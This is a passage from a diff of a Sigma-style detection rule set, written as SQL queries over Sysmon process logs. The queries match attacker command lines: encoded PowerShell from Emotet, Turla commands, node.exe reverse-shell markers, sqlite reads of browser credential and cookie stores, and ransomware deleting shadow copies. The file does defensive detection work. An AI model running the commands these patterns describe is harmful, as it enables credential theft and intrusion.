"proc_creation_win_sysinternals_procdump_lsass.yml" + "filename": "proc_creation_win_winrar_execution.yml" }, { - "title": "HackTool - WinRM Access Via Evil-WinRM", - "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "title": "Execute Code with Pester.bat", + "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", "status": "test", - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_evil_winrm.yml" + "filename": "proc_creation_win_lolbin_pester_1.yml" }, { - "title": "Execution via Diskshadow.exe", - "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "status": "test", - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "author": "Ivan Dyachkov, oscd.community", + "title": "HackTool - Wmiexec Default Powershell Command", + "id": "022eaba8-f0bf-4dd9-9217-4604b0bb3bb0", + "status": "experimental", + "description": "Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1218" + "attack.defense_evasion", + "attack.lateral_movement" ], "falsepositives": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diskshadow.yml" + "filename": "proc_creation_win_hktl_wmiexec_default_powershell.yml" }, { - "title": "ZOHO Dctask64 Process Injection", - "id": "6345b048-8441-43a7-9bed-541133633d7a", + "title": "Arbitrary Command Execution Using WSL", + "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "status": "test", - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", + "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1055.001" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Automation and orchestration scripts may use this method to execute scripts etc.", + "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\' OR CommandLine LIKE '%--debug-shell%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" + "filename": "proc_creation_win_wsl_lolbin_execution.yml" }, { - "title": "UAC Bypass Using ChangePK and SLUI", - "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "status": "test", - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Script Execution From Temp Folder", + "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "status": "experimental", + "description": "Detects a suspicious script executions from temporary folder", + "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" + "filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "Potential Emotet Activity", - "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "status": "stable", - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine 
LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_emotet.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets", - "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", - "status": "test", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", - "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "File Download Via Bitsadmin To A Suspicious Target Folder", - "id": "2ddef153-167b-4e89-86b6-757a9e65dcac", + "title": "PDQ Deploy Remote Adminstartion Tool Execution", + "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file to a suspicious target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of PDQ Deploy remote admin tool", + "author": "frack113", "tags": [ - 
"attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" ], - "filename": "proc_creation_win_bitsadmin_download_susp_targetfolder.yml" + "filename": "proc_creation_win_pdqdeploy_execution.yml" }, { - "title": "PUA - NirCmd Execution", - "id": "4e2ed651-1906-4a59-a78a-18220fca1b22", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", "status": "experimental", - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + 
"author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NirCmd.exe' ESCAPE '\\' OR OriginalFileName = 'NirCmd.exe' OR (CommandLine LIKE '% execmd %' ESCAPE '\\' OR CommandLine LIKE '%.exe script %' ESCAPE '\\' OR CommandLine LIKE '%.exe shexec %' ESCAPE '\\' OR CommandLine LIKE '% runinteractive %' ESCAPE '\\')) OR ((CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% exec2 %' ESCAPE '\\') AND (CommandLine LIKE '% show %' ESCAPE '\\' OR CommandLine LIKE '% hide %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nircmd.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", 
@@ -16838,596 +16747,580 @@ "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "Potential Credential Dumping Via LSASS Process Clone", - "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "title": "Curl.EXE Execution With Custom UserAgent", + "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", "status": "test", - "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "description": "Detects execution of curl.exe with custom useragent options", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Scripts created by developers and admins", + "Administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_lsass_clone.yml" + "filename": "proc_creation_win_curl_useragent.yml" }, { - "title": "Suspicious Msbuild Execution By Uncommon Parent Process", - "id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "status": "experimental", - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "author": "frack113", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze 
ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSBuild.exe' ESCAPE '\\' OR OriginalFileName = 'MSBuild.exe') AND NOT ((ParentImage LIKE '%\\\\devenv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nuget.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msbuild_susp_parent_process.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Remote Access Tool - AnyDesk Execution", - "id": "b52e84a3-029e-4529-b09b-71d19dd27e94", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when 
compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Process Memory Dump Via Dotnet-Dump", + "id": "53d8d3e1-ca33-4012-adf3-e05a4d652e34", + "status": "experimental", + "description": "Detects the execution of \"dotnet-dump\" with the \"collect\" flag. The execution could indicate potential process dumping of critical processes such as LSASS", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet-dump.exe' ESCAPE '\\' OR OriginalFileName = 'dotnet-dump.dll') AND CommandLine LIKE '%collect%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk.yml" + "filename": "proc_creation_win_lolbin_dotnet_dump.yml" }, { - "title": "Execution in Outlook Temp Folder", - "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "status": "test", - "description": "Detects a suspicious program execution in Outlook temp folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Use of Mftrace.exe", + "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "status": "experimental", + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unknown" + "Legitimate use for tracing purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentImage LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" + "filename": "proc_creation_win_lolbin_mftrace.yml" }, { - "title": "Turla Group Commands May 2020", - "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", - "status": "test", - "description": "Detects commands used by Turla group as reported by ESET in May 2020", - "author": "Florian Roth (Nextron Systems)", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059.001", - "attack.t1053.005", - "attack.t1027" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE 
'\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_comrat_may20.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Format.com FileSystem LOLBIN", - "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", - "status": "test", - "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "status": "experimental", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_format.yml" + "filename": 
"proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Suspicious PowerShell Encoded Command Patterns", - "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "title": "Add New Windows Capability - ProcCreation", + "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", "status": "experimental", - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Other tools that work with encoded scripts in the command line instead of script files" + "Legitimate usage of the capabilities by administartors or users. Filter accordingly" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% 